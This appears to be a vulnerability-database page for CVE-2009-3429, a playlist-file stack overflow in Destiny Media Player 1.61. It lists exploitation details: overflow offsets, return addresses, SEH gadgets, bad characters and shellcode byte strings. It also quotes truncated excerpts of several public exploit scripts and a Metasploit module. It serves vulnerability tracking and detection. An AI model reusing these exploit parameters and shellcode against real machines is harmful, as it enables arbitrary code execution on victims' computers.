CVE-2009-3429
published 2009-09-25CVE-2009-3429: Stack-based buffer overflow in Pirate Radio Destiny Media Player 1.61 allows remote attackers to execute arbitrary code via a long string in a .pls playlist…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
35.05%
98.2th percentile
Stack-based buffer overflow in Pirate Radio Destiny Media Player 1.61 allows remote attackers to execute arbitrary code via a long string in a .pls playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pirateradio | destiny_media_player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xD0\x69\x83\x7c (return address, lst exploit)
bytes↗
\xA6\x7B\x41\x00 (pop pop ret Destiny.exe SEH handler)
bytes↗
\xEB\x06\x90\x90 (short jump next SEH)
bytes↗
win32_exec shellcode (lst exploit): \x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b...
bytes↗
win32_exec shellcode (pls SEH exploit): \x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b...
- →Stack-based buffer overflow triggered by opening a crafted .pls, .m3u, or .lst playlist file in Destiny Media Player 1.61; overflow occurs at offset 2052 bytes for .lst files and ~31185 bytes for .m3u files. ↗
- →For .m3u exploitation, the overflow is triggered at approximately 31185 bytes of input. ↗
- →For .pls SEH-based exploitation, junk padding of 45224 bytes precedes the SEH overwrite. ↗
- →Metasploit module targets Destiny Media Player 1.61 via file format exploit; payload space is 800 bytes with bad chars \x00\x0a\x0d\x3c\x22\x3e\x3d and AlphanumMixed encoder required. ↗
- →Victim must manually open the malicious playlist file via File-->Open Playlist; this is a client-side file-format attack, not a network-delivered exploit. ↗
- →SEH-based .pls exploit uses a pop/pop/ret gadget inside Destiny.exe at 0x00417BA6; monitor for SEH chain overwrites pointing into Destiny.exe image space. ↗
- →Shellcode uses PexFnstenvSub encoder (Metasploit); detect FNSTENV-based shellcode decoder stubs in memory when Destiny Media Player processes playlist files. ↗
- ·The working .lst exploit was confirmed only on Windows XP SP3; the PoC version did not function correctly according to the author. ↗
- ·The Metasploit module's 'Destiny Universal' target ret address (0x00bf9d4d) was tested and confirmed by a third party (patrickw) on 2009-05-03; the Windows XP SP2 Spanish target uses a system DLL address (0x7c951eed) which may vary across patch levels. ↗
- ·The .pls SEH exploit instructs the victim to open the file directly (not via import), unlike the .lst exploit which requires import from within the program. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2009-3429 Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)
Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)
---
##
# $Id: destinymediaplayer16.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Destiny Media Player 1.61 PLS M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.
An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek ' ],
'Version' => '$Revision: 9179 $',
'References' =
Exploit-DB
Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)
exploitdb·2009-08-01
CVE-2009-3429 Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)
Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)
---
#!/usr/bin/perl
#[+] Bug : Destiny Media Player 1.61 (.pls) Universal Buffer overflow (SEH)
#[+] Author : ThE g0bL!N
#[+] Greetz : ma 3labaliche :D
#[+] Use : open the pls file directly :)
#[+] Note: His0k4 Merci jamais Raditni
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98
Exploit-DB
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)
exploitdb·2009-01-04
CVE-2009-3429 Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)
---
# Destiny Media Player 1.61 (lst File) Local Buffer overflow Exploit
# By:Encrypt3d.M!nd
#
# i was so stupid when i wrote the poc coz i didn't realize somethings :p
# well this is workin exploit tested on windows xp sp3
# don't double click the file,import it from the program
#
# Greetz:-=Mizo=-(thnx dude :X),L!0N,El Mariachi,MiNi SpIder,all my friends
#
chars = "A" * 2052
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164
Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13"
"\x88\x79\x7b\x83\xeb\xfc\xe2\xf4\xef\x60\x3d\x7b\x13\x88\xf2\x3e"
"\x2f\x03\x05\x7e\x6b\x89\x96\xf0\x5c\x90\xf2\x24\x33\x89\x92\x32"
"\x98\xbc\xf2\x7a\xfd\xb9\xb9\xe2\xbf\x0c\xb9
Exploit-DB
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)
exploitdb·2009-01-03
CVE-2009-3429 Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)
---
#
# Destiny Media Player (lst file) Buffer overflow PoC
# By:Encrypt3d.M!nd
# I'am Iraqian...Not Arabian
###########################################
# Well,i've tried to write an exploit for this shit but i couldn't
# the address after the NEW eip will over written,if anyone
# knows how to exploit this,be my guest
chars = "A"*2052
eip = "\x42\x42\x42\x42" # the eip will become 42424242
file=open('exp.lst','w')
file.write(chars+eip+chars)
file.close()
# milw0rm.com [2009-01-03]
Exploit-DB
Destiny Media Player 1.61 - '.m3u' Local Stack Overflow
exploitdb·2009-01-03
CVE-2009-3429 Destiny Media Player 1.61 - '.m3u' Local Stack Overflow
Destiny Media Player 1.61 - '.m3u' Local Stack Overflow
---
#usage: exploit.py
#After creating the m3u file, start the program then File > Open Playlist > exploit.m3u
print "**************************************************************************"
print " Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit\n"
print " Founder: aBo MoHaMeD"
print " exploit & code: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 2052
EIP = "\x5D\x38\x82\x7C" #call ESP from kernel32.dll
nop = "\x90" * 10 #Blah Blah :D
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode =
Exploit-DB
Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-01-02
CVE-2009-3429 Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)
Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)
---
#!/usr/bin/perl -w
########################################################################
#Program : Destiny Media Player
#Version : 1.61.0
#website : http://www.pirateradio.com/downloads/
#Download : http://www.pirateradio.com/downloads/destinymp3.exe
#Type : (.m3u File) local Stack Overflow PoC
########################################################################
#EAX 61616161
#ECX 00000001
#EDX 014377A0
#EBX 0000000B
#ESP 0030FFEC
#EBP 00312C04 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
#ESI 00000000
#EDI 00312C44 AS
Metasploit
Destiny Media Player 1.61 PLS M3U Buffer Overflow
metasploit
Destiny Media Player 1.61 PLS M3U Buffer Overflow
Destiny Media Player 1.61 PLS M3U Buffer Overflow
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61. An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
No writeups or analysis indexed.
2009-09-25
Published